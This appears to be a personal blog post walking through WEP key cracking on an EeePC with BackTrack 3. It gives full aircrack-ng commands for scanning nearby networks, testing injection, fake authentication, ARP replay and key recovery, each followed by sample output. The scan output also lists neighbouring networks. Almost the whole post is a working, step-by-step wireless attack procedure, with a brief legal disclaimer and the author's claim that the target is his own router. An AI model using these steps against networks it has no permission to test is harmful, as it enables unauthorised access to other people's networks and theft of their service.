This is a simple guide to cracking WEP.
First off, this guide is for the EeePC 900 using BackTrack 3 Final, live, from a USB drive. I cannot guarantee that it will work with your machine.
Second, I am not an expert, so don’t start firing questions at me.
Third, this guide is a simplified version of several tutorials I have read.
Fourth, I have used this guide successfully a number of times, so I know it works for me.
Fifth, type carefully. One tiny mistake = Much hair pulling.
Lastly, cracking other people’s WEP keys and using their bandwidth without permission is theft and is illegal in the UK and many other countries.
So don't do it.
Please, use this guide wisely…
__________________________________________________________________
__________________________________________________________________
LET’S FIND A NETWORK TO CRACK!!
__________________________________________________________________
Open a terminal. Enter:
airodump-ng start ath0
The reply should look similar to this:
CH 8 ][ Elapsed: 8 s ][ 2009-06-09 12:11
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:22:3F:37:AC:0E 2 3 0 0 6 54 WPA TKIP PSK madangupta
00:1F:9F:43:78:65 3 4 0 0 11 54 WEP WEP Thomson12BAE8
00:1A:C4:D0:26:A1 6 6 0 0 5 54. WEP WEP BTBusinessHub-246
00:1A:C4:D0:26:A3 6 9 0 0 5 54. WPA TKIP PSK BT Fusion-3246
00:14:7F:DC:1A:13 24 22 0 0 6 54 WEP WEP Johnsrouter
00:1D:68:09:A6:93 20 23 0 0 1 54 WEP WEP BTHomeHub-17CE
BSSID STATION PWR Rate Lost Packets Probes
Then note the details of the network you want to use. Remember, it’s WEP encryption we’re looking for. A PWR rating of 20 and above is usually strong enough for packet injection to work, more of which later. The details you will need are the ESSID, BSSID and Channel Number.
Then hit Ctr+C to stop airodump.
The network I am going to be attempting to crack is my own. Because it's legal.
Cracking anything other is illegal.
So don't fuck about.
The following are my details.
ESSID: Johnsrouter
BSSID: 00:14:7F:DC:1A:13
Channel: 6
My wireless card’s Mac address: 00:0F:B5:88:AC:82 (you will find yours later).
__________________________________________________________________
__________________________________________________________________
LET’S GO!!
__________________________________________________________________
STEP 1 - Start the wireless card in monitor mode on the same channel as the access point.
Open a terminal. Enter:
airmon-ng stop ath0
The system should reply:
Interface Chipset Driver
wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0) (VAP destroyed)
Enter:
iwconfig
The reply should look similar to this:
lo no wireless extensions.
eth0 no wireless extensions.
wifi0 no wireless extensions.
Now, enter the following command to start the wireless card in monitor mode on channel 6.:
airmon-ng start wifi0 6
Replace the 6 with whatever channel your access point is using.
The reply should look similar to this
Interface Chipset Driver
wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0) (monitor mode enabled)
Enter:
iwconfig
The reply should look similar to this:
lo no wireless extensions.
wifi0 no wireless extensions.
eth0 no wireless extensions.
ath0 IEEE 802.11g ESSID:”" Nickname:”"
Mode:Monitor Frequency:2.452 GHz Access Point: 00:0F:B5:88:AC:82
Bit Rate:0 kb/s Tx-Power:18 dBm Sensitivity=0/3
Retry:off RTS thr:off Fragment thr:off
Encryption key:off
Power Management:off
Link Quality=0/94 Signal level=-95 dBm Noise level=-95 dBm
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0
Here, you should make a note of your machine’s mac addresss. You can see mine above: 00:0F:B5:88:AC:82
__________________________________________________________________
__________________________________________________________________
STEP 2 - Test Wireless Device Packet Injection
Now to make sure you’re able to use packet injection.
Enter:
aireplay-ng -9 -e Johnsrouter -a 00:14:7F:DC:1A:13 ath0
Where:
-9 means injection test
-e Johnsrouter is the wireless network name (replace it with yours)
-a 00:14:7F:DC:1A:13 is the access point MAC address (replace it with yours)
The reply should look similar to this:
09:23:35 Waiting for beacon frame (BSSID: 00:14:7F:DC:1A:13) on channel 6
09:23:35 Trying broadcast probe requests…
09:23:35 Injection is working!
09:23:37 Found 1 AP
09:23:37 Trying directed probe requests…
09:23:37 00:14:7F:DC:1A:13 - channel: 6 - ‘Johnsrouter’
09:23:39 Ping (min/avg/max): 1.827ms/68.145ms/111.610ms Power: 33.73
09:23:39 30/30: 100%
On the last line it says 100%. You need a high percentage for successful injection.
If it’s quite low, you may be too far from the access point for injection to work.
__________________________________________________________________
__________________________________________________________________
STEP 3 - Start airodump-ng to capture the IVs
The purpose of this step is to capture the IVs generated.
Open a new terminal.
Enter:
airodump-ng -c 6 –bssid 00:14:7F:DC:1A:13 -w output ath0
Where:
-c 6 is the channel for the wireless network (replace it with yours).
–bssid 00:14:7F:DC:1A:13 is the access point’s MAC address (replace it with yours). Yes, it is a a double hyphen for this one.
-w capture is file name prefix for the file which will contain the IVs.
While the injection is taking place (later), the reply should look similar to this:
CH 6 ][ Elapsed: 11 mins ][ 2009-06-09 12:15
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:14:7F:DC:1A:13 42 100 5240 178307 338 6 54 WEP WEP Johnsrouter
BSSID STATION PWR Lost Packets Probes
00:14:7F:DC:1A:13 00:0F:B5:88:AC:82 42 0 183782
__________________________________________________________________
__________________________________________________________________
STEP 4 - Use aireplay-ng to do a fake authentication with the access point
Open a new terminal.
Enter:
aireplay-ng -1 0 -e Johnsrouter -a 00:14:7F:DC:1A:13 -h 00:0F:B5:88:AC:82 ath0
Where:
-1 means fake authentication
0 is the reassociation timing in seconds
-e Johnsrouter is the wireless network name (replace it with yours)
-a 00:14:7F:DC:1A:13 is the access point MAC address (replace it with yours)
-h 00:0F:B5:88:AC:82 is our card MAC addresss (replace it with yours)
The reply should look similar to this:
18:18:20 Sending Authentication Request
18:18:20 Authentication successful
18:18:20 Sending Association Request
18:18:20 Association successful
_________________________________________________________________
_________________________________________________________________
STEP 5 - Start aireplay-ng in ARP request replay mode
Open a new terminal.
Enter:
aireplay-ng -3 -b 00:14:7F:DC:1A:13 -h 00:0F:B5:88:AC:82 ath0
Where:
-b 00:14:7F:DC:1A:13 is the access point MAC address (replace it with yours)
-h 00:0F:B5:88:AC:82 is our card MAC addresss (replace it with yours)
The reply should look similar to this:
Saving ARP requests in replay_arp-0321-191525.cap
You should also start airodump-ng to capture replies.
Read 629399 packets (got 316283 ARP requests), sent 210955 packets…
You can confirm that you are injecting by checking your airodump-ng screen. The data packets should be increasing rapidly. The ”#/s” should be a decent number. However, decent depends on a large variety of factors. A typical range is 300 to 400 data packets per second. It can as low as a 100/second and as high as a 500/second.
__________________________________________________________________
__________________________________________________________________
STEP 6 - Run aircrack-ng to obtain the WEP key
The purpose of this step is to obtain the WEP key from the IVs gathered in the previous steps.
Open a new terminal.
Enter:
aircrack-ng -z -b 00:14:7F:DC:1A:13 output*.cap
Where:
-z invokes the PTW WEP-cracking method.
-b 00:14:7F:DC:1A:13 is the access point MAC address (replace it with yours).
Generally, you will need about 20,000 packets for 64-bit and between 40,000 and 85,000 packets for 128 bit.
This can vary wildly so, be patient.
This output can run to a few pages and it may stop, telling you that it will attempt again.
Again, be patient.
The reply (if successful) should look similar to this:
Aircrack-ng 0.9
[00:03:06] Tested 674449 keys (got 96610 IVs)
KB depth byte(vote)
0 0/ 9 12( 15) F9( 15) 47( 12) F7( 12) FE( 12) 1B( 5) 77( 5) A5( 3) F6( 3) 03( 0)
1 0/ 8 34( 61) E8( 27) E0( 24) 06( 18) 3B( 16) 4E( 15) E1( 15) 2D( 13) 89( 12) E4( 12)
2 0/ 2 56( 87) A6( 63) 15( 17) 02( 15) 6B( 15) E0( 15) AB( 13) 0E( 10) 17( 10) 27( 10)
3 1/ 5 78( 43) 1A( 20) 9B( 20) 4B( 17) 4A( 16) 2B( 15) 4D( 15) 58( 15) 6A( 15) 7C( 15)
KEY FOUND! [ 12:34:56:78:90 ]
Probability: 100%
So, the key is:
[ 12:34:56:78:90 ]
Remove the brackets and colons so the key looks like this:
1234567890
and that’s the key you enter when asked for the WEP key by your wireless manager.
No comments:
Post a Comment